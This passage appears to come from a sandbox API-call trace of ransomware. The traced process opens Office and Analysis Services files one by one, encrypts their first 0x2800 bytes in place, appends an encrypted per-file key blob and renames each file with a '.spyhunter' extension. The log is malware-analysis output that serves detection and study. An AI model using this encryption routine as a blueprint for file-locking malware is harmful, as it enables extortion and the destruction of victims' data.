dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 64 [0166.467] StrStrW (lpFirst="AUTHZAX.DLL", lpSrch=".txt") returned 0x0 [0166.467] GetProcessHeap () returned 0x2c0000 [0166.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.467] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce59c*=0x2800, lpOverlapped=0x0) returned 1 [0166.644] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.644] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce59c*=0x2800, lpOverlapped=0x0) returned 1 [0166.644] GetProcessHeap () returned 0x2c0000 [0166.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.644] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.644] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5dc*, lpNumberOfBytesWritten=0x25ce59c*=0x4, lpOverlapped=0x0) returned 1 [0166.743] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce59c*=0x30, lpOverlapped=0x0) returned 1 [0166.743] CloseHandle (hObject=0xb0) returned 1 [0166.744] GetProcessHeap () returned 0x2c0000 [0166.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.744] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.spyhunter") returned 74 [0166.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll.spyhunter")) returned 1 [0166.745] GetProcessHeap () returned 0x2c0000 [0166.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.745] GetProcessHeap () returned 0x2c0000 [0166.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.745] GetProcessHeap () returned 0x2c0000 [0166.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e053b8 | out: hHeap=0x2c0000) returned 1 [0166.745] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5e0 | out: pbBuffer=0x25ce5e0) returned 1 [0166.745] GetProcessHeap () returned 0x2c0000 [0166.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.746] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5d8*=0x30) returned 1 [0166.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.746] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM") returned 70 [0166.747] StrStrW (lpFirst="OWSHLP10.CHM", lpSrch=".txt") returned 0x0 [0166.747] GetProcessHeap () returned 0x2c0000 [0166.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.747] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce59c*=0x0, lpOverlapped=0x0) returned 1 [0166.747] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.747] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce59c*=0x0, lpOverlapped=0x0) returned 1 [0166.747] GetProcessHeap () returned 0x2c0000 [0166.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.747] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.747] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5dc*, lpNumberOfBytesWritten=0x25ce59c*=0x4, lpOverlapped=0x0) returned 1 [0166.749] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce59c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce59c*=0x30, lpOverlapped=0x0) returned 1 [0166.749] CloseHandle (hObject=0xb0) returned 1 [0166.749] GetProcessHeap () returned 0x2c0000 [0166.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.749] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM.spyhunter") returned 80 [0166.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm.spyhunter")) returned 1 [0166.750] GetProcessHeap () returned 0x2c0000 [0166.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.750] GetProcessHeap () returned 0x2c0000 [0166.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.750] GetProcessHeap () returned 0x2c0000 [0166.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e1f0 | out: hHeap=0x2c0000) returned 1 [0166.751] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5d8 | out: pbBuffer=0x25ce5d8) returned 1 [0166.751] GetProcessHeap () returned 0x2c0000 [0166.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.751] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5d0*=0x30) returned 1 [0166.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.752] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL") returned 69 [0166.752] StrStrW (lpFirst="OCLTINT.DLL", lpSrch=".txt") returned 0x0 [0166.752] GetProcessHeap () returned 0x2c0000 [0166.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.752] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce594*=0x2800, lpOverlapped=0x0) returned 1 [0166.754] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.754] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce594*=0x2800, lpOverlapped=0x0) returned 1 [0166.754] GetProcessHeap () returned 0x2c0000 [0166.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.754] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.754] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x25ce5d4*, lpNumberOfBytesWritten=0x25ce594*=0x4, lpOverlapped=0x0) returned 1 [0166.769] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce594*=0x30, lpOverlapped=0x0) returned 1 [0166.769] CloseHandle (hObject=0xb0) returned 1 [0166.773] GetProcessHeap () returned 0x2c0000 [0166.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.773] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL.spyhunter") returned 79 [0166.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll.spyhunter")) returned 1 [0166.775] GetProcessHeap () returned 0x2c0000 [0166.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.775] GetProcessHeap () returned 0x2c0000 [0166.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.775] GetProcessHeap () returned 0x2c0000 [0166.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e118 | out: hHeap=0x2c0000) returned 1 [0166.775] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5d8 | out: pbBuffer=0x25ce5d8) returned 1 [0166.775] GetProcessHeap () returned 0x2c0000 [0166.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.775] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5d0*=0x30) returned 1 [0166.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.777] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 68 [0166.777] StrStrW (lpFirst="DL_RES.DLL", lpSrch=".txt") returned 0x0 [0166.777] GetProcessHeap () returned 0x2c0000 [0166.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.777] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce594*=0x2800, lpOverlapped=0x0) returned 1 [0166.808] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.808] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce594*=0x2800, lpOverlapped=0x0) returned 1 [0166.808] GetProcessHeap () returned 0x2c0000 [0166.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.808] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.808] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x25ce5d4*, lpNumberOfBytesWritten=0x25ce594*=0x4, lpOverlapped=0x0) returned 1 [0166.808] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce594, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce594*=0x30, lpOverlapped=0x0) returned 1 [0166.808] CloseHandle (hObject=0xb0) returned 1 [0166.809] GetProcessHeap () returned 0x2c0000 [0166.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.809] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.spyhunter") returned 78 [0166.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll.spyhunter")) returned 1 [0166.810] GetProcessHeap () returned 0x2c0000 [0166.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.810] GetProcessHeap () returned 0x2c0000 [0166.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.811] GetProcessHeap () returned 0x2c0000 [0166.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e040 | out: hHeap=0x2c0000) returned 1 [0166.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5d0 | out: pbBuffer=0x25ce5d0) returned 1 [0166.811] GetProcessHeap () returned 0x2c0000 [0166.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5c8*=0x30) returned 1 [0166.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.811] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 80 [0166.811] StrStrW (lpFirst="msolui100.dll", lpSrch=".txt") returned 0x0 [0166.811] GetProcessHeap () returned 0x2c0000 [0166.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.812] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce58c*=0x2800, lpOverlapped=0x0) returned 1 [0166.848] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.848] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce58c*=0x2800, lpOverlapped=0x0) returned 1 [0166.848] GetProcessHeap () returned 0x2c0000 [0166.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.848] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.848] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5cc*, lpNumberOfBytesWritten=0x25ce58c*=0x4, lpOverlapped=0x0) returned 1 [0166.867] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce58c*=0x30, lpOverlapped=0x0) returned 1 [0166.867] CloseHandle (hObject=0xb0) returned 1 [0166.915] GetProcessHeap () returned 0x2c0000 [0166.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.915] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.spyhunter") returned 90 [0166.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolui100.dll.spyhunter")) returned 1 [0166.916] GetProcessHeap () returned 0x2c0000 [0166.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.916] GetProcessHeap () returned 0x2c0000 [0166.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0166.916] GetProcessHeap () returned 0x2c0000 [0166.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecea10 | out: hHeap=0x2c0000) returned 1 [0166.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5d0 | out: pbBuffer=0x25ce5d0) returned 1 [0166.917] GetProcessHeap () returned 0x2c0000 [0166.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0166.917] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5c8*=0x30) returned 1 [0166.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0166.917] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 87 [0166.917] StrStrW (lpFirst="sql70.xsl", lpSrch=".txt") returned 0x0 [0166.917] GetProcessHeap () returned 0x2c0000 [0166.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.918] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce58c*=0x2800, lpOverlapped=0x0) returned 1 [0166.978] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.978] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce58c*=0x2800, lpOverlapped=0x0) returned 1 [0166.978] GetProcessHeap () returned 0x2c0000 [0166.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.978] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.978] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5cc*, lpNumberOfBytesWritten=0x25ce58c*=0x4, lpOverlapped=0x0) returned 1 [0167.016] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce58c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce58c*=0x30, lpOverlapped=0x0) returned 1 [0167.016] CloseHandle (hObject=0xb0) returned 1 [0167.016] GetProcessHeap () returned 0x2c0000 [0167.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.016] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.spyhunter") returned 97 [0167.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.spyhunter")) returned 1 [0167.017] GetProcessHeap () returned 0x2c0000 [0167.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.018] GetProcessHeap () returned 0x2c0000 [0167.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.018] GetProcessHeap () returned 0x2c0000 [0167.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecaa78 | out: hHeap=0x2c0000) returned 1 [0167.018] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5c8 | out: pbBuffer=0x25ce5c8) returned 1 [0167.018] GetProcessHeap () returned 0x2c0000 [0167.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.018] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5c0*=0x30) returned 1 [0167.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.020] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 87 [0167.020] StrStrW (lpFirst="msjet.xsl", lpSrch=".txt") returned 0x0 [0167.020] GetProcessHeap () returned 0x2c0000 [0167.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.020] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.251] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.251] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.251] GetProcessHeap () returned 0x2c0000 [0167.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.251] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 